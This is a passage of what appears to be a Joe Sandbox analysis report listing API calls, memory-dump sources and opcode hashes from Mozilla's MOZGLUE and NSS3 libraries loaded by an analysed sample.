                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                        • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                                                        • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                                                                                        • Opcode ID: 4d756d7b586fb7cef3ebc328a06e01d6cbfc5f912773102675c2d21d84a2005f
                                                                                                                                                                                                                                                                                        • Instruction ID: d84e05f63a72de7a68e8d34bbf0d1c838d4e2629b7378d504d66db9bbf957e2d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d756d7b586fb7cef3ebc328a06e01d6cbfc5f912773102675c2d21d84a2005f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72F0E9767012029FDB006FB4D84C99A777CEB8675DF000031FB1683702CB35AB008B61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,6C750DF8), ref: 6C750E82
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C750EA1
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C750EB5
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C750EC5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                                                                                        • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 391052410-1680159014
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C77CFAE,?,?,?,6C7431A7), ref: 6C7805FB
                                                                                                                                                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C77CFAE,?,?,?,6C7431A7), ref: 6C780616
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C7431A7), ref: 6C78061C
                                                                                                                                                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C7431A7), ref: 6C780627
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _writestrlen
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C7A14C5
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7A14E2
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C7A1546
                                                                                                                                                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C7A15BA
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C7A16B4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1909280232-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C8CDAE2,?), ref: 6C8CC6C2
                                                                                                                                                                                                                                                                                        • PR_Now.NSS3 ref: 6C8CCD35
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DC6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929DED
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C3F
                                                                                                                                                                                                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C8CCD54
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929BF0: TlsGetValue.KERNEL32(?,?,?,6C970A75), ref: 6C929C07
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C861CCC,00000000,00000000,?,?), ref: 6C8B729F
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8CCD9B
                                                                                                                                                                                                                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C8CCE0B
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C8CCE2C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C10F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: EnterCriticalSection.KERNEL32(?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C110C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1141
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PR_Unlock.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1182
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C119C
                                                                                                                                                                                                                                                                                        • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C8CCE40
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C14C0: TlsGetValue.KERNEL32 ref: 6C8C14E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C14C0: EnterCriticalSection.KERNEL32 ref: 6C8C14F5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C14C0: PR_Unlock.NSS3 ref: 6C8C150D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: PORT_ArenaMark_Util.NSS3(?,6C8CCD93,?), ref: 6C8CCEEE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C8CCD93,?), ref: 6C8CCEFC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C8CCD93,?), ref: 6C8CCF0B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C8CCD93,?), ref: 6C8CCF1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C8CCD93,?), ref: 6C8CCF47
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C8CCD93,?), ref: 6C8CCF67
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8CCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C8CCD93,?,?,?,?,?,?,?,?,?,?,?,6C8CCD93,?), ref: 6C8CCF78
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3748922049-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 47f75c3057241f6bceb179a30a2e57ca301c8b64dcaa8f0bf249a72781e75ebd
                                                                                                                                                                                                                                                                                        • Instruction ID: 3f508c29452512f795988125f2a8e02b8932562e34dacde7bad266f2e0de4de8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47f75c3057241f6bceb179a30a2e57ca301c8b64dcaa8f0bf249a72781e75ebd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B451B3B6B001049BE720DF69DE40B9A77F4AF49348F250938D955A7B42EB31E905CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79DC60
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C79D38A,?), ref: 6C79DC6F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,6C79D38A,?), ref: 6C79DCC1
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C79D38A,?), ref: 6C79DCE9
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C79D38A,?), ref: 6C79DD05
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C79D38A,?), ref: 6C79DD4A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1842996449-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4103f1b45b9e71466fc356a8f8c506baf6c2278523be85203e11761332cd87f7
                                                                                                                                                                                                                                                                                        • Instruction ID: 25a85c9a7f92c0db1cfffdbc517d250554737787d8f05577dc18b9c6aafee60a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4103f1b45b9e71466fc356a8f8c506baf6c2278523be85203e11761332cd87f7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF419DB5A00206CFCB00CFA9D9849AAB7F9FF89308B154469E905ABB21D771FC10CF90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C77F480
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74F100: LoadLibraryW.KERNEL32(shell32,?,6C7BD020), ref: 6C74F122
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C74F132
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6C77F555
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7514B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C751248,6C751248,?), ref: 6C7514C9
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7514B0: memcpy.VCRUNTIME140(?,6C751248,00000000,?,6C751248,?), ref: 6C7514EF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C74EEE3
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C77F4FD
                                                                                                                                                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C77F523
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                                        • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                                        • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                                                        • Opcode ID: 729d1029e32e86092fee1bca54196a27931ddc96f25b7bc6a4d17def847c843e
                                                                                                                                                                                                                                                                                        • Instruction ID: 99cb3cb6580b89b9490cf9c5a3501af622d4f7a6bc91c93a9e8a1c0e076a8748
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 729d1029e32e86092fee1bca54196a27931ddc96f25b7bc6a4d17def847c843e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A541BA306047559FD720DF78CA84BABB7F4AF44318F504A2CF59197650EB70E649CBA2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6C7A7526
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7A7566
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7A7597
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                                                        • Opcode ID: 99b0cd73042fba093567b1852f8cd75a8ad402912d4386f8c93d020192f3bf0e
                                                                                                                                                                                                                                                                                        • Instruction ID: 62be979992014af70eeb45872ae89989e521c78dad49e78919a82d0ec51a0f24
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99b0cd73042fba093567b1852f8cd75a8ad402912d4386f8c93d020192f3bf0e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F721F231B01502EFDF148BF8CE18E993375EB46335F444638E81597F40D720BA278AA6
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7AC0E9), ref: 6C7AC418
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C7AC437
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C7AC0E9), ref: 6C7AC44C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                                                        • Opcode ID: c8dc79fda80a6251e35b4960adacbff02662bf3c5195d7983209aa40fc2897ee
                                                                                                                                                                                                                                                                                        • Instruction ID: 8e2c65bda336a0994c684772927a32948f4bf1b3c9775218f380f0c3cb1912a7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8dc79fda80a6251e35b4960adacbff02662bf3c5195d7983209aa40fc2897ee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89E0927460530BAFDB006F728A487117EFCA70AA05F004236BA0492600EBB1D6418A54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7A748B,?), ref: 6C7A75B8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C7A75D7
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C7A748B,?), ref: 6C7A75EC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                                                        • Opcode ID: 5853c57bb67d1a1f1cfaf887c971190999bd04ccf51689ec9b7c53eb0ff8c7ff
                                                                                                                                                                                                                                                                                        • Instruction ID: ce2e7b480e70b401d30fd5feda64bfa9b76e031141b52bc6c9a2ab93ea355c7c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5853c57bb67d1a1f1cfaf887c971190999bd04ccf51689ec9b7c53eb0ff8c7ff
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EE092B2640307AFEB006BB2C9487057AFCEB07758F504135A905D2600EBB0D26A8F51
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,?,?,6C7ABE49), ref: 6C7ABEC4
                                                                                                                                                                                                                                                                                        • RtlCaptureStackBackTrace.NTDLL ref: 6C7ABEDE
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C7ABE49), ref: 6C7ABF38
                                                                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL ref: 6C7ABF83
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(6C7ABE49,00000000), ref: 6C7ABFA6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
